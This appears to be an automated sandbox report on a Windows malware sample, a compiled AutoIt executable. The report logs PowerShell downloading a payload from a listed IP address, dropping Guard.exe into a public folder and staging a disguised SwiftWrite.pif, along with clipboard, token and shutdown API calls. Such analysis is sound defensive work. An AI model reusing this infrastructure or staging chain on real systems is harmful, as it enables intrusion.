00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /kYCQj.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 139.99.188.124:80 -> 192.168.2.5:49704
Source: unknownDNS traffic detected: query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs replaycode: Name error (3)
Source: global trafficHTTP traffic detected: GET /TSKUVpnJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AE968 InternetQueryDataAvailable,InternetReadFile,0_2_00007FF7EC1AE968
Source: global trafficHTTP traffic detected: GET /TSKUVpnJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kYCQj.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: cxZuGa.exe, 00000000.00000002.2060480429.0000017C03FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/TSKUVpnJ
Source: powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.0.drString found in binary or memory: http://139.99.188.124/kYCQj.txt
Source: powershell.exe, 00000004.00000002.2097758108.00000236544AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H2.
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000004.00000002.2097448709.0000023651695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftH
Source: powershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000006.00000002.3264677363.0000000000CF9000.00000002.00000001.01000000.00000007.sdmp, Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000000B.00000002.3264616200.00000000006B9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF7EC1B0D24
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF7EC1B0D24
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CA4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00CA4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00664830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00664830
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF7EC1B0A6C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC198E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,0_2_00007FF7EC198E18
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CBD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00CBD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0067D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0067D164

System Summary

barindex
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF7EC1237B0
Source: cxZuGa.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: cxZuGa.exe, 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b131a2bb-0
Source: cxZuGa.exe, 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_d7d3d454-e
Source: cxZuGa.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a83085bf-9
Source: cxZuGa.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_55c51dfc-e
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,0_2_00007FF7EC1A3E20
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF7EC18CE68
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF7EC19D750
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C95778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00C95778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00655778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00655778
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1BF6300_2_00007FF7EC1BF630
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC162D200_2_00007FF7EC162D20
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC166DE40_2_00007FF7EC166DE4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC132E300_2_00007FF7EC132E30
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1CCE8C0_2_00007FF7EC1CCE8C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC140E900_2_00007FF7EC140E90
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC130E700_2_00007FF7EC130E70
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1530DC0_2_00007FF7EC1530DC
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC122AE00_2_00007FF7EC122AE0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1C0AEC0_2_00007FF7EC1C0AEC
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B6C340_2_00007FF7EC1B6C34
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1C055C0_2_00007FF7EC1C055C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1CA59C0_2_00007FF7EC1CA59C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1CC6D40_2_00007FF7EC1CC6D4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1667F00_2_00007FF7EC1667F0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC15A8A00_2_00007FF7EC15A8A0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC14C1300_2_00007FF7EC14C130
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1402C40_2_00007FF7EC1402C4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B63200_2_00007FF7EC1B6320
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B83600_2_00007FF7EC1B8360
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A83D40_2_00007FF7EC1A83D4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC14C3FC0_2_00007FF7EC14C3FC
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1624000_2_00007FF7EC162400
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1584C00_2_00007FF7EC1584C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1445140_2_00007FF7EC144514
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC12BE700_2_00007FF7EC12BE70
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC14BEB40_2_00007FF7EC14BEB4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC125F3C0_2_00007FF7EC125F3C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B206C0_2_00007FF7EC1B206C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC15793C0_2_00007FF7EC15793C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1CBA0C0_2_00007FF7EC1CBA0C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC12B9F00_2_00007FF7EC12B9F0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC13FA4F0_2_00007FF7EC13FA4F
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A1A180_2_00007FF7EC1A1A18
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1CDB180_2_00007FF7EC1CDB18
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC133C200_2_00007FF7EC133C20
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1595B00_2_00007FF7EC1595B0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B56A00_2_00007FF7EC1B56A0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1517500_2_00007FF7EC151750
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1D17C00_2_00007FF7EC1D17C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC12183C0_2_00007FF7EC12183C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1618400_2_00007FF7EC161840
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19D87C0_2_00007FF7EC19D87C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1358D00_2_00007FF7EC1358D0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC14F8D00_2_00007FF7EC14F8D0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC16529C0_2_00007FF7EC16529C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B32AC0_2_00007FF7EC1B32AC
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC12B3900_2_00007FF7EC12B390
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C3B0206_2_00C3B020
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C394E06_2_00C394E0
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C39C806_2_00C39C80
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C523F56_2_00C523F5
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CB84006_2_00CB8400
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C665026_2_00C66502
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C3E6F06_2_00C3E6F0
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C6265E6_2_00C6265E
